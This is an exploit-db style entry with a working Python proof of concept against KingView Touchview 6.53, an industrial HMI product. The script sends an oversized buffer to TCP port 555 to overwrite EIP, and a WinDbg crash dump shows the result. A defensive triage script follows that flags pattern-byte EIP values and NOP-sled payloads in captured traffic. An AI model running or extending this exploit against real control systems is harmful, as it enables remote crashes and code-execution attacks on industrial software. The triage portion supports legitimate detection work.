Kingview Touchview 6.53 – EIP Overwrite

  • Author: Carlos Mario Penagos Hollmann
    Date: 2012-06-25
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/19388/
# Exploit Title: Kingview Touchview EIP direct control
# Date: June 24 2012
# Exploit Author: Carlos Mario Penagos Hollmann
# Vendor Homepage: www.kingview.com

# Version: 6.53
# Tested on: Windows SP 1
# CVE :
    
Open KingView, click Make, choose Network Configuration ---> Network
Parameter, then go to the node type and choose "Local is a Login Server".
Run the demo and port 555 will be open.
NOTE:
This was already patched by the vendor silently.
    
import socket

host = "10.0.2.15"   # host running the KingView Touchview demo
port = 555           # port opened by the "Local is a Login Server" node type

# Padding layout that reaches the saved return address; the four bytes
# "\x44\x43\x42\x41" land in EIP as 0x41424344 (see the crash dump below).
exploit = b"\x90" * 1024
exploit += b"A" * 23976
exploit += b"B" * 12500
exploit += b"D" * 6250
exploit += b"E" * 6002
exploit += b"\x44\x43\x42\x41"
exploit += b"\x90" * 256

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.sendall(exploit)          # sendall: the payload is ~50 KB, send() may write only part of it
data = s.recv(1024)
print("[+] Closing connection..")
s.close()
print("[+] Done!")
    
    
Register state at the crash (WinDbg):

eax=7ffdf000 ebx=00000000 ecx=40000000 edx=00000008 esi=41424344 edi=0012f6b4
eip=41424344 esp=0012f650 ebp=0012f678 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
41424344 ??

Call to stack (call stack at the fault):
0x41424344
USER32!GetDC+0x6d
USER32!EnumDisplaySettingsA+0x27d
USER32!EnumDisplaySettingsA+0xc9
USER32!DefDlgProcA+0x22
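As an added triage helper (not part of the original exploit-db entry), the script below does two things a defender would want when handling a crash like the one above: it parses a WinDbg register dump and flags an EIP made entirely of printable pattern bytes as attacker-controlled, and it scores a captured TCP payload for the traits of this PoC (oversized, long single-byte runs, NOP sled). The register text and payload are constructed samples modelled on this page; the thresholds are assumptions to tune per environment.

```python
import re

# Constructed sample: a WinDbg "r" dump shaped like the one on this page.
SAMPLE_REGS = ("eax=7ffdf000 ebx=00000000 ecx=40000000 edx=00000008 "
               "esi=41424344 edi=0012f6b4\n"
               "eip=41424344 esp=0012f650 ebp=0012f678 iopl=0")
# Constructed sample payload with the same shape as the PoC, but shorter.
SAMPLE_PAYLOAD = b"\x90" * 1024 + b"A" * 300 + b"DCBA"

def parse_registers(text):
    """Return {name: int} for every 32-bit reg=hex pair in a WinDbg dump."""
    return {m.group(1): int(m.group(2), 16)
            for m in re.finditer(r"\b(e[a-z]{2})=([0-9a-fA-F]{8})", text)}

def looks_attacker_controlled(value):
    """True when all four bytes are printable ASCII, i.e. pattern data, not code."""
    return all(0x20 <= b < 0x7f for b in value.to_bytes(4, "little"))

def triage_crash(text):
    """True if the dumped EIP was overwritten with printable pattern bytes."""
    eip = parse_registers(text).get("eip")
    return eip is not None and looks_attacker_controlled(eip)

def longest_run(data):
    """(length, byte) of the longest run of one repeated byte in data."""
    best_len, best_byte, cur_len, prev = 0, None, 0, None
    for b in data:
        cur_len = cur_len + 1 if b == prev else 1
        prev = b
        if cur_len > best_len:
            best_len, best_byte = cur_len, b
    return best_len, best_byte

def triage_payload(data, max_len=4096, max_run=256):
    """List the traits of this PoC found in a captured payload (assumed thresholds)."""
    findings = []
    if len(data) > max_len:
        findings.append(f"oversized:{len(data)}")
    run_len, run_byte = longest_run(data)
    if run_len > max_run:
        findings.append(f"byte-run:0x{run_byte:02x}x{run_len}")
    if b"\x90" * 64 in data:          # 64 consecutive NOPs: a sled, not data
        findings.append("nop-sled")
    return findings

if __name__ == "__main__":
    print("EIP attacker-controlled:", triage_crash(SAMPLE_REGS))
    print("payload findings:", triage_payload(SAMPLE_PAYLOAD))
```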